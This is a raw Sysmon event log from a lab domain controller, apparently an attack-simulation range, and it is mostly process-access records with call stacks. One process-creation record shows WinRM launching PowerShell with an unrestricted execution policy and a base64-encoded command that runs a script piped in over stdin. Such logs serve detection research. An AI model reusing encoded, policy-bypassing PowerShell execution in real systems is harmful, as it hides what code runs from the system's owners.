08:40:26.180{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000323Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.180{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000322Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.180{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000321Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.180{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000320Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.180{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000319Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.180{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000318Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.180{5D479F2C-14FE-5F84-0500-000000007E01}640656C:\Windows\system32\csrss.exe{5D479F2C-167A-5F84-0803-000000007E01}4872C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000317Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.180{5D479F2C-167A-5F84-0603-000000007E01}44964248C:\Windows\system32\WinrsHost.exe{5D479F2C-167A-5F84-0803-000000007E01}4872C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\WinrsHost.exe+2c94|C:\Windows\system32\WinrsHost.exe+2eb1|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+7d09|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+b42b|C:\Windows\System32\combase.dll+53b8c|C:\Windows\System32\combase.dll+53842|C:\Windows\System32\combase.dll+51968|C:\Windows\System32\combase.dll+4fedd|C:\Windows\System32\combase.dll+4f5bf|C:\Windows\System32\combase.dll+6da09|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5982e|C:\Windows\System32\RPCRT4.dll+39257|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb 154100x8000000000000000316Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.184{5D479F2C-167A-5F84-0803-000000007E01}4872C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=C:\Users\Administrator\ATTACKRANGE\Administrator{5D479F2C-167A-5F84-77B4-110000000000}0x11b4770HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{5D479F2C-167A-5F84-0603-000000007E01}4496C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 10341000x8000000000000000315Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.180{5D479F2C-1504-5F84-0B00-000000007E01}8603768C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000314Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.180{5D479F2C-1504-5F84-0B00-000000007E01}8603768C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000313Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.165{5D479F2C-1504-5F84-0B00-000000007E01}8603768C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000312Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.165{5D479F2C-1507-5F84-1300-000000007E01}13081948C:\Windows\system32\svchost.exe{5D479F2C-167A-5F84-0603-000000007E01}4496C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\winrscmd.dll+8d36|C:\Windows\system32\winrscmd.dll+92d5|C:\Windows\system32\winrscmd.dll+af31|C:\Windows\system32\winrscmd.dll+23dc|c:\windows\system32\wsmsvc.dll+155ac7|c:\windows\system32\wsmsvc.dll+13f76d|c:\windows\system32\wsmsvc.dll+13f3cf|c:\windows\system32\wsmsvc.dll+13fcb2|c:\windows\system32\wsmsvc.dll+9ab10|c:\windows\system32\wsmsvc.dll+9b611|c:\windows\system32\wsmsvc.dll+4495|c:\windows\system32\wsmsvc.dll+16816c|c:\windows\system32\wsmsvc.dll+1689b8|c:\windows\system32\wsmsvc.dll+16345b|c:\windows\system32\wsmsvc.dll+163125|c:\windows\system32\wsmsvc.dll+14ce9c|c:\windows\system32\wsmsvc.dll+130049|c:\windows\system32\wsmsvc.dll+13571a|c:\windows\system32\wsmsvc.dll+12f47e|c:\windows\system32\wsmsvc.dll+125587|c:\windows\system32\wsmsvc.dll+11f562|c:\windows\system32\wsmsvc.dll+124574 10341000x8000000000000000311Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.165{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-167A-5F84-0603-000000007E01}4496C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000310Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.149{5D479F2C-167A-5F84-0703-000000007E01}50444736C:\Windows\system32\conhost.exe{5D479F2C-167A-5F84-0603-000000007E01}4496C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000309Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.149{5D479F2C-14FE-5F84-0500-000000007E01}6401148C:\Windows\system32\csrss.exe{5D479F2C-167A-5F84-0703-000000007E01}5044C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000308Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.149{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000307Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.149{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000306Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.149{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000305Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.149{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000304Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.149{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000303Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 